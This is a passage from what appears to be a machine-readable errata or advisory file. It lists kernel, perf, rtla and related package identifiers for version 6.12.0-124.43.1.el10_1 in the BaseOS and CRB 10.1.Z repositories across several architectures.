"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"CRB-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
